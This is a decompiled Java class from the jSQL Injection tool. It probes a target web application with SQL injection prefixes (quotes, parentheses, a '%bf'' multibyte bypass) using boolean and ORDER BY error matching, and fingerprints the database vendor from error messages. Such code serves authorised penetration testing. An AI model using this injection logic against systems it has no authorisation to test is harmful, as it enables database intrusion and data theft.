/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.suspendable;

import com.jsql.model.InjectionModel;
import com.jsql.model.bean.util.Header;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.exception.StoppedByUserSlidingException;
import com.jsql.model.injection.strategy.blind.InjectionCharInsertion;
import com.jsql.model.injection.vendor.MediatorVendor;
import com.jsql.model.injection.vendor.model.Vendor;
import com.jsql.model.suspendable.AbstractSuspendable;
import com.jsql.model.suspendable.callable.CallablePageSource;
import com.jsql.util.I18nUtil;
import com.jsql.util.LogLevelUtil;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.EnumMap;
import java.util.List;
import java.util.Optional;
import java.util.concurrent.CompletionService;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import org.apache.commons.lang3.RandomStringUtils;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class SuspendableGetCharInsertion
extends AbstractSuspendable {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private static final String LABEL_PREFIX = "prefix";

    public SuspendableGetCharInsertion(InjectionModel injectionModel) {
        super(injectionModel);
    }

    @Override
    public String run(Object ... args) throws JSqlException {
        String characterInsertionByUser = (String)args[0];
        ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableGetInsertionCharacter");
        ExecutorCompletionService<CallablePageSource> taskCompletionService = new ExecutorCompletionService<CallablePageSource>(taskExecutor);
        String[] charFromBooleanMatch = new String[1];
        List<String> charactersInsertion = this.initializeCallables(taskCompletionService, characterInsertionByUser, charFromBooleanMatch);
        MediatorVendor mediatorVendor = this.injectionModel.getMediatorVendor();
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Fingerprinting database and character insertion with Order by match...");
        String charFromOrderBy = null;
        int total = charactersInsertion.size();
        while (0 < total) {
            if (this.isSuspended()) {
                throw new StoppedByUserSlidingException();
            }
            try {
                CallablePageSource currentCallable = (CallablePageSource)taskCompletionService.take().get();
                --total;
                String pageSource = currentCallable.getContent();
                List<Vendor> vendorsOrderByMatch = this.getVendorsOrderByMatch(mediatorVendor, pageSource);
                if (vendorsOrderByMatch.isEmpty()) continue;
                this.setVendor(mediatorVendor, vendorsOrderByMatch);
                LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Using [{}]", (Object)mediatorVendor.getVendor());
                Request requestSetVendor = new Request();
                requestSetVendor.setMessage(Interaction.SET_VENDOR);
                EnumMap<Header, Object> msgHeader = new EnumMap<Header, Object>(Header.class);
                msgHeader.put(Header.URL, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlByUser());
                msgHeader.put(Header.VENDOR, mediatorVendor.getVendor());
                requestSetVendor.setParameters(msgHeader);
                this.injectionModel.sendToViews(requestSetVendor);
                charFromOrderBy = currentCallable.getCharacterInsertion();
                LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Character insertion [{}] matching with Order by and compatible with Error strategy", (Object)charFromOrderBy);
                break;
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
                Thread.currentThread().interrupt();
            }
            catch (ExecutionException e) {
                LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, (Throwable)e);
            }
        }
        try {
            taskExecutor.shutdown();
            if (!taskExecutor.awaitTermination(15L, TimeUnit.SECONDS)) {
                taskExecutor.shutdownNow();
            }
        }
        catch (InterruptedException e) {
            LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, (Throwable)e);
            Thread.currentThread().interrupt();
        }
        if (charFromOrderBy == null && charFromBooleanMatch[0] != null) {
            charFromOrderBy = charFromBooleanMatch[0];
        }
        return this.getCharacterInsertion(characterInsertionByUser, charFromOrderBy);
    }

    private void setVendor(MediatorVendor mediatorVendor, List<Vendor> vendorsOrderByMatch) {
        if (vendorsOrderByMatch.size() == 1 && vendorsOrderByMatch.get(0) != mediatorVendor.getVendor()) {
            mediatorVendor.setVendor(vendorsOrderByMatch.get(0));
        } else if (vendorsOrderByMatch.size() > 1) {
            if (vendorsOrderByMatch.contains(mediatorVendor.getPostgreSQL())) {
                mediatorVendor.setVendor(mediatorVendor.getPostgreSQL());
            } else if (vendorsOrderByMatch.contains(mediatorVendor.getMySQL())) {
                mediatorVendor.setVendor(mediatorVendor.getMySQL());
            } else {
                mediatorVendor.setVendor(vendorsOrderByMatch.get(0));
            }
        }
    }

    private List<Vendor> getVendorsOrderByMatch(MediatorVendor mediatorVendor, String pageSource) {
        return mediatorVendor.getVendors().stream().filter(vendor -> vendor != mediatorVendor.getAuto()).filter(vendor -> StringUtils.isNotEmpty(vendor.instance().getModelYaml().getStrategy().getConfiguration().getFingerprint().getOrderByErrorMessage())).filter(vendor -> {
            Optional<String> optionalOrderByErrorMatch = Stream.of(vendor.instance().getModelYaml().getStrategy().getConfiguration().getFingerprint().getOrderByErrorMessage().split("[\\r\\n]+")).filter(errorMessage -> Pattern.compile(".*" + errorMessage + ".*", 32).matcher(pageSource).matches()).findAny();
            if (optionalOrderByErrorMatch.isPresent()) {
                LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, String.format("Order by fingerprint matching vendor [%s]", vendor));
            }
            return optionalOrderByErrorMatch.isPresent();
        }).collect(Collectors.toList());
    }

    private List<String> initializeCallables(CompletionService<CallablePageSource> taskCompletionService, String characterInsertionByUser, String[] charFromBooleanMatch) throws JSqlException {
        List<String> prefixValues = Arrays.asList(RandomStringUtils.random(10, "012"), "1");
        List<String> prefixQuotes = Arrays.asList(LABEL_PREFIX, "prefix'", "prefix\"", "prefix%bf'");
        List<String> prefixParentheses = Arrays.asList("", ")", "))");
        ArrayList<String> charactersInsertion = new ArrayList<String>();
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Fingerprinting character insertion with Boolean match...");
        for (String prefixValue : prefixValues) {
            for (String prefixQuote : prefixQuotes) {
                for (String prefixParenthesis : prefixParentheses) {
                    this.checkInsertionChar(charFromBooleanMatch, charactersInsertion, prefixValue, prefixQuote, prefixParenthesis);
                }
            }
        }
        for (String characterInsertion : charactersInsertion) {
            taskCompletionService.submit(new CallablePageSource(characterInsertion + " " + this.injectionModel.getMediatorVendor().getVendor().instance().sqlOrderBy(), characterInsertion, this.injectionModel, "prefix#orderby"));
        }
        return charactersInsertion;
    }

    private void checkInsertionChar(String[] charFromBooleanMatch, List<String> charactersInsertion, String prefixValue, String prefixQuote, String prefixParenthesis) throws StoppedByUserSlidingException {
        InjectionCharInsertion injectionCharInsertion;
        String characterInsertion = prefixQuote.replace(LABEL_PREFIX, prefixValue) + prefixParenthesis;
        charactersInsertion.add(characterInsertion);
        if (charFromBooleanMatch[0] == null && (injectionCharInsertion = new InjectionCharInsertion(this.injectionModel, characterInsertion, prefixQuote + prefixParenthesis)).isInjectable()) {
            if (this.isSuspended()) {
                throw new StoppedByUserSlidingException();
            }
            charFromBooleanMatch[0] = characterInsertion;
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Found character insertion [{}] using Boolean match", () -> charFromBooleanMatch[0]);
        }
    }

    private String getCharacterInsertion(String characterInsertionByUser, String characterInsertionDetected) {
        String characterInsertionDetectedFixed = characterInsertionDetected;
        if (characterInsertionDetectedFixed == null) {
            characterInsertionDetectedFixed = StringUtils.isEmpty(characterInsertionByUser) || "*".equals(characterInsertionByUser) ? "1" : characterInsertionByUser;
            String logCharacterInsertion = characterInsertionDetectedFixed;
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "No character insertion found, forcing to [{}]", () -> logCharacterInsertion.replace("*", ""));
        } else if (!characterInsertionByUser.replace("*", "").equals(characterInsertionDetectedFixed)) {
            String characterInsertionByUserFormat = characterInsertionByUser.replace("*", "");
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Using [{}] and [{}]", () -> this.injectionModel.getMediatorVendor().getVendor(), () -> characterInsertionDetected);
            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Add manually the character * like [{}*] to force the value [{}]", () -> characterInsertionByUserFormat, () -> characterInsertionByUserFormat);
        } else {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "{} [{}]", () -> I18nUtil.valueByKey("LOG_USING_INSERTION_CHARACTER"), () -> characterInsertionDetected.replace("*", ""));
        }
        return characterInsertionDetectedFixed.replace("*", "+*");
    }
}

